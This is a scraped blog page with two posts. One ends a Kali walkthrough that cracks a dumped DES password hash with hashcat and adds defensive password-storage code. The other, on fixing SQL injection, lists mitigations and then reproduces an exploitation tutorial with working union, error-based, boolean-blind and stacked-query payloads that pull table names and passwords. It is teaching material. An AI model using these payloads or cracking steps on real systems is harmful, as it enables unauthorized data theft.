That is exactly right. This is a hashed password. That means the password is stored in hashed form and now we need to crack it.<br />
I have covered how to decrypt passwords extensively in this <a href="http://www.darkmoreops.com/2014/08/14/cracking-md5-phpbb-mysql-and-sha1-passwords-with-hashcat/" target="_blank" title="Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux">Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux</a> post. If you’ve missed it, you’re missing out on a lot.<br />
<br />
I will cover it in short here but you should really learn how to use hashcat.<br />
<br />
<h2>
<span id="Step_7_Cracking_password"><span style="color: #993300;">Step 7: Cracking password</span></span></h2>
So the hashed password is <code> 24iYBc17xK0e. </code>. How do you know what type of hash that is?<br />
<br />
<h3>
<span id="Step_7a_Identify_Hash_type"><span style="color: #993300;">Step 7.a: Identify Hash type</span></span></h3>
Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line, type in the following command and paste the hash value at the prompt:<br />
<pre>hash-identifier</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7" class="alignnone size-full wp-image-183" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/737x493xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-7.jpg.pagespeed.ic.Yo2op9uxYb.jpg" height="493" width="737" /></a><br />
Excellent. So this is a DES(Unix) hash.<br />
<br />
<h3>
<span id="Step_7b_Crack_HASH_using_cudahashcat"><span style="color: #993300;">Step 7.b: Crack HASH using cudahashcat</span></span></h3>
First of all I need to know which code to use for DES hashes. So let’s check that:<br />
<pre>cudahashcat --help | grep DES</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8" class="alignnone size-full wp-image-184" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/737x155xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-8.jpg.pagespeed.ic.gxQxKdwd8_.jpg" height="155" width="737" /></a><br />
So it’s either 1500 or 3100. But it was a MySQL database, so it must be 1500.<br />
I am running a computer that’s got an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop, I’ve got an AMD ATI graphics card, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.<br />
I saved the hash value <code> 24iYBc17xK0e. </code> in the <code> DES.hash </code> file. The following is the command I am running:<br />
<pre>cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9" class="alignnone size-full wp-image-185" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1004x810xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-9.jpg.pagespeed.ic.qG0lcBYYxB.jpg" height="810" width="1004" /></a><br />
Interesting find: the usual Hashcat was unable to determine the code for the DES hash (it’s not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.<br />
Anyhow, so here’s the cracked password: abc123. <code> 24iYBc17xK0e.:abc123 </code><br />
Sweet, we now even have the password for this user.<br />
<br />
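Seen from the side of whoever stores the passwords, this hash fell quickly for two reasons: traditional DES crypt has only a 12-bit salt and uses only the first eight characters of the password, and abc123 is in every common wordlist. The following added example (not from the original post) flags legacy hash formats in a user table and stores new passwords with a salted, slow KDF; the storage format, the iteration count and the tiny common-password set are assumptions.

```python
import base64
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 600_000  # assumption: tune to your own hardware and latency budget
# Constructed stand-in for a real breached-password list such as the one used above.
COMMON_PASSWORDS = {"abc123", "123456", "password", "qwerty"}
# Schemes that are fast to compute and therefore cheap to attack with a wordlist.
LEGACY_SCHEMES = {"descrypt", "md5crypt", "raw-md5", "raw-sha1"}


def classify_stored_hash(stored):
    """Guess the scheme from the string format alone (a heuristic, not proof)."""
    if stored.startswith("pbkdf2_sha256$"):
        return "pbkdf2-sha256"
    if stored.startswith("$1$"):
        return "md5crypt"
    if re.match(r"\$2[aby]\$", stored):
        return "bcrypt"
    if stored.startswith("$5$"):
        return "sha256crypt"
    if stored.startswith("$6$"):
        return "sha512crypt"
    if stored.startswith("$argon2"):
        return "argon2"
    if re.fullmatch(r"[0-9a-fA-F]{32}", stored):
        return "raw-md5"
    if re.fullmatch(r"[0-9a-fA-F]{40}", stored):
        return "raw-sha1"
    # Traditional DES crypt: 2 salt characters + 11 hash characters.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", stored):
        return "descrypt"
    return "unknown"


def needs_rehash(stored):
    """True when the record should be migrated (forced reset or rehash on login)."""
    return classify_stored_hash(stored) in LEGACY_SCHEMES


def _b64(data):
    return base64.b64encode(data).decode("ascii")


def hash_password(password):
    """Store a new password: refuse wordlist entries, then salt and stretch."""
    if len(password) < 8 or password.lower() in COMMON_PASSWORDS:
        raise ValueError("password is too short or is a known common password")
    salt = os.urandom(16)  # unique per user, so equal passwords get different records
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return "pbkdf2_sha256${}${}${}".format(PBKDF2_ITERATIONS, _b64(salt), _b64(derived))


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_b64, derived_b64 = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(derived_b64)
        rounds = int(iterations)
    except ValueError:  # wrong field count, bad base64 or bad integer
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    dumped = "24iYBc17xK0e."  # the hash from the walkthrough above
    print(dumped, classify_stored_hash(dumped), "needs rehash:", needs_rehash(dumped))
```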
<br />
Note: If you are using Kali Linux 2.0, then cudahashcat would be "hashcat".<br />
<br />
Source: darkmoreops, OWASP, Stack Overflow<br />
Hope it helps.<br />
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com40tag:blogger.com,1999:blog-4509349481580895365.post-70250783012100635482015-08-28T11:56:00.000+05:302015-08-28T11:56:13.307+05:30How to fix sql injection ?<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
In my previous post I explained what SQL injection is; in this article I deal with how to fix SQL injection.<br />
<br />
In general, the precautions that need to be taken are:<br />
<ul style="text-align: left;">
<li>You can prevent SQL injection if you adopt an input validation
technique in which user input is validated against a set of defined
rules for length, type and syntax and also against business rules.</li>
<li>You should ensure that users with the permission to access the
database have the least privileges. Additionally, do not use system
administrator accounts like “sa” for web applications. Also, you should
always make sure that a database user is created only for a specific
application and this user is not able to access other applications.
Another method for preventing SQL injection attacks is to remove all
stored procedures that are not in use.</li>
<li>Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.</li>
<li>Take care when using stored procedures: they are generally safe
from injection, but they can still be injectable (such as
via the use of exec() or concatenating arguments within the stored
procedure).</li>
</ul>
</div>
<br />
SQL injection is a particularly interesting risk for a few different reasons:<br />
<ol>
<li>It’s
getting increasingly harder to write vulnerable code due to frameworks
that automatically parameterise inputs – yet we still write bad code.</li>
<li>You’re not necessarily in the clear just because you use stored procedures or a shiny ORM (you’re aware that <a href="http://www.troyhunt.com/2012/12/stored-procedures-and-orms-wont-save.html">SQLi can still get through these</a>, right?) – we still build vulnerable apps around these mitigations.</li>
<li>It’s
easily detected remotely by automated tools which can be orchestrated
to crawl the web searching for vulnerable sites – yet we’re still
putting them out there.</li>
</ol>
It remains <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">number one on the OWASP Top 10</a>
for a very good reason – it’s common, it’s very easy to exploit and the
impact of doing so is severe. One little injection risk in one little
feature is often all it takes to disclose every piece of data in the
whole system – and I’m going to show you how to do this yourself using a
raft of different techniques.<br />
I demonstrated how to protect against SQLi a couple of years back when I wrote about <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">the OWASP Top 10 for .NET developers</a>
so I’m not going to focus on mitigation here, this is all about
exploiting. But enough of the boring defending stuff, let’s go break
things!<br />
<h4>
All your datas are belong to us (if we can break into the query context)</h4>
Let’s do a quick recap on what it is that makes SQLi possible. In a nutshell, it’s about breaking out of the <i>data</i> context and entering the <i>query</i>
context. Let me visualise this for you; say you have a URL that includes a
query string parameter such as “id=1” and that parameter makes its way
down into a SQL query such as this:<br />
<div align="left">
<img alt="SELECT * FROM Widget WHERE ID = 1" border="0" src="http://lh3.ggpht.com/-v8wf12yBReA/Ufd7GKiDAwI/AAAAAAAAFik/h1aZURZ2j7Q/Untitled-12.png?imgmax=800" height="103" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="632" /></div>
The entire URL probably looked something like this:<br />
<img alt="http://widgetshop.com/Widget/?id=1" border="0" src="http://lh3.ggpht.com/-yJGNQFXQ8Jg/Ufd7Gs6hNPI/AAAAAAAAFis/EMvlU6I2FuQ/Untitled-22.png?imgmax=800" height="110" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="650" /><br />
Pretty
basic stuff, where it starts to get interesting is when you can
manipulate the data in the URL such that it changes the value passed to
the query. Ok, changing “1” to “2” will give you a different widget and
that’s to be expected, but what if you did this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 or 1=1</span></u><br />
That might then persist through to the database server like so:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: grey;">* </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">ID </span><span style="color: grey;">= </span>1 <span style="color: grey;">OR </span>1<span style="color: grey;">=</span>1
</pre>
What this tells us is that the data is not being sanitised – in the
examples above the ID should clearly be an integer yet the value “1 OR
1=1” has been accepted. More importantly though, because this data has
simply been appended to the query <i>it has been able to change the function of the statement</i>. Rather than just selecting a single record, this query will now select <i>all</i> records as the “1=1” statement will always be true. Alternatively, we could force the page to return <i>no</i>
records by changing “or 1=1” to “and 1=2” as it will always be false
hence no results. Between these two alternatives we can easily assess if
the app is at risk of an injection attack.<br />
This is the essence of SQL injection – manipulating query execution
with untrusted data – and it happens when developers do things like
this:<br />
<span style="background: white; color: black;">query = </span><span style="background: white; color: #a31515;">"SELECT * FROM Widget WHERE ID = "</span><span style="background: white; color: black;"> + Request.QueryString[</span><span style="background: white; color: #a31515;">"ID"</span><span style="background: white; color: black;">];</span><br />
<span style="background: white; color: green;">// Execute the query...</span><br />
Of course what they should be doing is parameterising the untrusted data but I’m not going to go into that here (refer back to <a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">part one of my OWASP series</a> for more info on mitigation), instead I want to talk more about exploiting SQLi.<br />
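The difference between concatenating the value and binding it, covering the input-validation and parameterised-query items from the precautions list, as an added example that is not part of the original article. It uses Python's sqlite3 module and a constructed Widget table as a stand-in for the ASP.NET and SQL Server stack discussed here; the function names are illustrative.<br />

```python
import re
import sqlite3

# Rule for the id parameter: ASCII decimal digits only, bounded length.
ID_RULE = re.compile(r"[0-9]{1,9}")


def make_db():
    """In-memory stand-in for the article's Widget table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Widget (ID INTEGER PRIMARY KEY, Name TEXT, TypeId INTEGER)")
    db.executemany("INSERT INTO Widget VALUES (?, ?, ?)",
                   [(1, "Sprocket", 1), (2, "Gear", 1), (3, "Cog", 2)])
    return db


def get_widget_concatenated(db, raw_id):
    """The pattern shown above: the request value becomes part of the SQL text."""
    query = "SELECT ID, Name FROM Widget WHERE ID = " + raw_id
    return db.execute(query).fetchall()


def get_widget_bound(db, raw_id):
    """Placeholder only: the driver passes the value as data, never as SQL."""
    return db.execute("SELECT ID, Name FROM Widget WHERE ID = ?", (raw_id,)).fetchall()


def parse_widget_id(raw_id):
    """Input validation for length, type and syntax before any query runs."""
    if not isinstance(raw_id, str) or not ID_RULE.fullmatch(raw_id):
        raise ValueError("id must be 1 to 9 decimal digits")
    return int(raw_id)


def get_widget(db, raw_id):
    """Validated and bound: the version a request handler should call."""
    return get_widget_bound(db, parse_widget_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    # The three query string values discussed in the text.
    for value in ("1", "1 or 1=1", "1 and 1=2"):
        print(repr(value), "concatenated ->", get_widget_concatenated(db, value))
        print(repr(value), "bound        ->", get_widget_bound(db, value))
```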
Ok, so that background covers how to demonstrate that a risk is
present, but what can you now do with it? Let’s start exploring some
common injection patterns.<br />
<h4>
Joining the dots: Union query-based injection</h4>
Let’s take an example where we expect a set of records to be returned
to the page, in this case it’s a list of widgets of “TypeId” 1 on a URL
like this:<br />
<span style="color: blue;"><u>http://widgetshop.com/Widgets/?TypeId=1</u></span><br />
The result on the page then looks like so:<br />
<img alt="3 widgets returned to the page" border="0" src="http://lh3.ggpht.com/-g7i0u59D7lE/Ufd7HFnj82I/AAAAAAAAFi0/GcgJwfnJYIQ/image6.png?imgmax=800" height="117" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="68" /><br />
We’d expect that query to look something like this once it hits the database:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: teal;">Name </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">TypeId </span><span style="color: grey;">= </span>1
</pre>
But if we can apply what I’ve outlined above, namely that we might be
able to just append SQL to the data in the query string, we might be
able to do something like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?TypeId=1 union all select name from sysobjects where xtype='u'</span></u><br />
Which would then create a SQL query like so:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: teal;">Name </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">WHERE </span><span style="color: teal;">TypeId </span><span style="color: grey;">= </span>1 <span style="color: blue;">union </span><span style="color: grey;">all </span><span style="color: blue;">select </span><span style="color: teal;">name </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u'
</span></pre>
Now keep in mind that the sysobjects table is the one that lists all
the objects in the database and in this case we’re filtering that list
by xtype “u” or in other words, user tables. When an injection risk is
present that would mean the following output:<br />
<img alt="3 widgets returned to the page followed by 2 internal table names" border="0" src="http://lh5.ggpht.com/-A6YoNxkRaqc/Ufd7HrZDOXI/AAAAAAAAFi8/GfPVE2fE21E/image9.png?imgmax=800" height="187" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="66" /><br />
This is what’s referred to as a union query-based injection attack as
we’ve simply appended an additional result set to the original and it’s
made its way out directly into the HTML output – easy! Now that we know
there’s a table called “User” we could do something like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?TypeId=1 union all select password from [user]</span></u><br />
SQL Server gets a bit uppity if the table name of “user” is not
enclosed in square brackets given the word has other meanings in the DB
sense. Regardless, here’s what that gives us:<br />
<img alt="3 widgets returned to the page followed by a password" border="0" src="http://lh6.ggpht.com/-vJk-tgqAQpg/Ufd7IFPK7lI/AAAAAAAAFjE/uhgNNX-YgWY/image2.png?imgmax=800" height="148" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="89" /><br />
Of course the UNION ALL statement only works when the first SELECT
statement has the same number of columns as the second. That’s easily
discoverable though, you just try going with a bit of ”union all select
‘a’” then if that fails “union all select ‘a’, ‘b’” and so on. Basically
you’re just guessing the number of columns until things work.<br />
We could go on and on down this path and pull back all sorts of other
data, let’s move on to the next attack though. There are times when a
union-based attack isn’t going to play ball either due to sanitisation
of the input or how the data is appended to the query or even how the
result set is displayed to the page. To get around that we’re going to
need to get a bit more creative.<br />
<h4>
Making the app squeal: Error-based injection</h4>
Let’s try another pattern – what if we did this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 or x=1</span></u><br />
Hang on, that’s not valid SQL syntax, the “x=1” piece won’t compute,
at least not unless there’s a column called “x” so won’t it just throw
an exception? Precisely, in fact it means you’ll see an exception like
this:<br />
<img alt="Invalid column name 'x'" border="0" src="http://lh6.ggpht.com/-iSzrFMeO-dw/Ufd7InmwlzI/AAAAAAAAFjM/u-o_hoEoAuM/image14.png?imgmax=800" height="187" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="845" /><br />
This is an ASP.NET error and other frameworks have similar paradigms but
the important thing is that the error message is disclosing information
about the internal implementation, namely that there is no column
called “x”. Why is this important? It’s fundamentally important because
once you establish that an app is leaking SQL exceptions, you can do
things like this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=convert(int,(select
top 1 name from sysobjects where id=(select top 1 id from (select top 1
id from sysobjects where xtype='u' order by id) sq order by id DESC)))</span></u> <br />
That’s a lot to absorb and I’ll come back to it in more detail, the
important thing is though that it will yield this result in the browser:
<br />
<img alt="Conversion failed when converting the varchar value 'Widget' to data type int." border="0" src="http://lh3.ggpht.com/-mM4agaXM6Cg/Ufd7JQvO_fI/AAAAAAAAFjU/tmIarbT7t_w/image17.png?imgmax=800" height="184" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
And there we have it, we’ve now discovered that there is a table in
the database called “Widget”. You’ll often see this referred to as
“Error-based SQL injection” due to the dependency on internal errors.
Let’s deconstruct the query from the URL:<br />
<pre class="code"><span style="color: magenta;">convert</span><span style="color: grey;">(</span><span style="color: blue;">int</span><span style="color: grey;">, (
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">name </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">DESC
</span><span style="color: grey;">)
)
)
</span></pre>
Working from the deepest nesting up, get the first record ID from the
sysobjects table after ordering by ID. From that collection, get the <i>last</i>
ID (this is why it orders in descending) and pass that into the top
select statement. That top statement is then only going to take the
table name <i>and try to convert it to an integer</i>. The conversion
to integer will almost certainly fail (please people, don’t name your
tables “1” or “2” or any other integer for that matter!) and that
exception then discloses the table name in the UI.<br />
Why three select statements? Because it means we can go into that
innermost one and change “top 1” to “top 2” which then gives us this
result:<br />
<img alt="Conversion failed when converting the varchar value 'User' to data type int." border="0" src="http://lh4.ggpht.com/-GJZJi34IK1Q/Ufd7J5OtHmI/AAAAAAAAFjc/XnioL8T3rvo/image20.png?imgmax=800" height="185" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
Now we know that there’s a table called “User” in the database. Using
this approach we can discover all the column names of each table (just
apply the same logic to the syscolumns table). We can then extend that
logic even further to select data from table columns:<br />
<img alt="Conversion failed when converting the varchar value 'P@ssw0rd' to data type int." border="0" src="http://lh5.ggpht.com/-QDCJLdU038g/Ufd7KXKELeI/AAAAAAAAFjk/XwdEg1W2yyI/image26.png?imgmax=800" height="184" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="844" /><br />
In the screen above, I’d already been able to discover that there was
a table called “User” and a column called “Password”, all I needed to
do was select out of that table (and again, you can enumerate through
all records one by one with nested select statements), and cause an
exception by attempting to convert the string to an int (you can always
append an alpha char to the data if it <i>really is</i> an int then
attempt to convert the whole lot to an int which will cause an
exception). If you want to get a sense of just how easy this can be, I
recorded a <a href="http://www.troyhunt.com/2012/10/hacking-is-childs-play-sql-injection.html">little video last year where I teach my 3 year old to automate this with Havij</a> which uses the technique.<br />
But there’s a problem with all this – it was only possible because
the app was a bit naughty and exposed internal error messages to the
general public. In fact the app quite literally <i>told us</i> the
names of the tables and columns and then disclosed the data when we
asked the right questions, but what happens when it doesn’t? I mean what
happens when the app is correctly configured so as not to leak the
details of internal exceptions?<br />
This is where we get into “blind” SQL injection which is the genuinely interesting stuff.<br />
<h4>
Hacking blind</h4>
In the examples above (and indeed in many precedents of successful
injection attacks), the attacks are dependent on the vulnerable app
explicitly disclosing internal details either by joining tables and
returning the data to the UI or by raising exceptions that bubble up to
the browser. Leaking of internal implementations is always a bad thing
and as you saw earlier, security misconfigurations such as this can be
leveraged to disclose more than just the application structure, you can
actually pull <i>data</i> out through this channel as well.<br />
A correctly configured app <i>should</i> return a message more akin to this one here when an <i>unhandled</i> exception occurs:<br />
<img alt="Error. An error occurred while processing your request." border="0" src="http://lh5.ggpht.com/-IN_JPtT0ZVc/Ufd7Ky6aXZI/AAAAAAAAFjs/cKXM5z4S7SQ/image29.png?imgmax=800" height="255" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="845" /><br />
This is the default error page from a brand new ASP.NET app with
custom errors configured but again, similar paradigms exist in other
technology stacks. Now this page is exactly the same as the earlier ones
that showed the internal SQL exceptions but rather than letting them
bubble up to the UI they’re being hidden and a friendly error message
shown instead. Assuming we also couldn’t exploit a union-based attack,
the SQLi risk is entirely gone, right? Not quite…<br />
Blind SQLi relies on us getting a lot more <i>implicit</i> or in
other words, drawing our conclusions based on other observations we can
make about the behaviour of the app that aren’t quite as direct as
telling us table names or showing column data directly in the browser by
way of unions or unhandled exceptions. Of course this now begs the
question – how can we make the app behave in an observable fashion such
that it discloses the information we had earlier without explicitly
telling us?<br />
We’re going to look at two approaches here: boolean-based and time-based.<br />
<h4>
Ask, and you shall be told: Boolean-based injection</h4>
This all comes down to asking the right questions of the app. Earlier
on, we could explicitly ask questions such as “What tables do you have”
or “What columns do you have in each table” and the database would
explicitly tell us. Now we need to ask a little bit differently, for
example like this:<br />
<u><span style="color: blue;">http://widgetshop.com/widget/?id=1 and 1=2</span></u><br />
Clearly this equivalency test can never be true – one will never be
equal to two. How an app at risk of injection responds to this request
is the cornerstone of blind SQLi and it can happen in one of two
different ways.<br />
Firstly, it might just throw an exception if no record is returned. Often developers will <i>assume</i>
that a record referred to in a query string exists because it’s usually
the app itself that has provided the link based on pulling it out of
the database on another page. When there’s no record returned, things
break. Secondly, the app <i>might not</i> throw an exception but then
it also won’t display a record either because the equivalency is false.
Either way, the app is implicitly telling us that no records were
returned from the database.<br />
Now let’s try this:<br />
<pre class="code">1 <span style="color: grey;">and
(
</span><span style="color: blue;">select top </span>1 <span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">)
) = </span><span style="color: red;">'a'
</span></pre>
Keeping in mind that this entire block replaces <i>just the query string value</i>
so instead of “?id=1” it becomes “?id=1 and…”, it’s actually only a
minor variation on the earlier requests intended to retrieve table
names. In fact the main difference is that rather than attempting to
cause an exception by converting a string to an integer, it’s now an
equivalency test to see if the first character of the table name is an
“a” (we’re assuming a case-insensitive collation here). If this request
gives us the same result as “?id=1” then it confirms that the first
table in sysobjects does indeed begin with an “a” as the equivalency has
held true. If it gives us one of the earlier mentioned two scenarios
(an error or shows no record), then we know that the table <i>doesn’t</i> begin with an “a” as no record has been returned.<br />
Now all of that only gives us the first character of the table name
from sysobjects, when you want the second character then the substring
statement needs to progress to the next position:<br />
<pre class="code"><span style="color: blue;">select top </span>1 <span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>2<span style="color: grey;">, </span>1<span style="color: grey;">) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span></pre>
You can see it now starts at position 2 rather than position 1. Of
course this is laborious; as well as enumerating through all the tables
in sysobjects you end up enumerating through all the possible letters of
the alphabet until you get a hit then you have to repeat the process
for each character of the table name. There is, however, a little
shortcut that looks like this:<br />
<pre class="code">1 <span style="color: grey;">and
(
</span><span style="color: blue;">select top </span>1 <span style="color: magenta;">ascii</span><span style="color: grey;">(</span><span style="color: magenta;">lower</span><span style="color: grey;">(</span><span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">))) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">)
) > </span>109
</pre>
There’s a subtle but important difference here: rather than
checking for an individual character match, it’s
looking for where that character falls in the ASCII table. Actually,
it’s first lowercasing the table name to ensure we’re only dealing with
26 characters (assuming alpha-only naming, of course), then it’s taking
the ASCII value of that character. In the example above, it then checks
to see if the character is further down the table than the letter “m”
(ASCII 109) and then of course the same potential outcomes as described
earlier apply (either a record comes back or it doesn’t). The main
difference is that rather than potentially making 26 attempts at
guessing the character (and consequently making 26 HTTP requests), it’s
now going to exhaust all possibilities in only 5 – you just keep halving
the possible ASCII character range until there’s only one possibility
remaining.<br />
For example, if greater than 109 then it must be between “n” and “z”
so you split that (roughly) in half and go greater than 115. If that’s
false then it must be between “n” and “s” so you split that bang in half
and go greater than 112. That’s true so there’s only three chars left
which you can narrow down to one in a max of two guesses. Bottom line is
that the max of 26 guesses (call it average of 13) is now done in only 5
as you simply just keep halving the result set.<br />
By constructing the right requests the app will still tell you
everything it previously did in that very explicit, rich error message
way, it’s just that it’s now being a little coy and you have to coax the
answers out of it. This is frequently referred to as “Boolean-based”
SQL injection and it works well where the previously demonstrated
“Union-based” and “Error-based” approaches won’t fly. But it’s also not
fool proof; let’s take a look at one more approach and this time we’re
going to need to be a little more patient.<br />
<h4>
Disclosure through patience: Time-based blind injection</h4>
Everything to date has worked on the presumption that the app will
disclose information via the HTML output. In the earlier examples the
union-based and error-based approaches gave us data in the browser that
explicitly told us object names and disclosed internal data. In the
blind boolean-based examples we were <i>implicitly</i> told the same
information by virtue of the HTML response being different based on a
true versus a false equivalency test. But what happens when this
information can’t be leaked via the HTML either explicitly or
implicitly?<br />
Let’s imagine another attack vector using this URL:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?OrderBy=Name</span></u><br />
In this case it’s pretty fair to assume that the query will translate through to something like this:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: grey;">* </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">ORDER BY </span><span style="color: teal;">Name
</span></pre>
Clearly we can’t just start adding conditions directly into the
ORDER BY clause (although there are other angles from which you could
mount a boolean-based attack), so we need to try another approach. A
common technique with SQLi is to terminate a statement and then append a
subsequent one, for example like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?OrderBy=Name;SELECT DB_NAME()</span></u><br />
That’s a pretty innocuous one (although certainly discovering the
database name can be useful), a more destructive approach would be to do
something like “DROP TABLE Widget”. Of course the account the web app
is connecting to the database with needs the rights to be able to do
this, the point is that once you can start chaining together queries
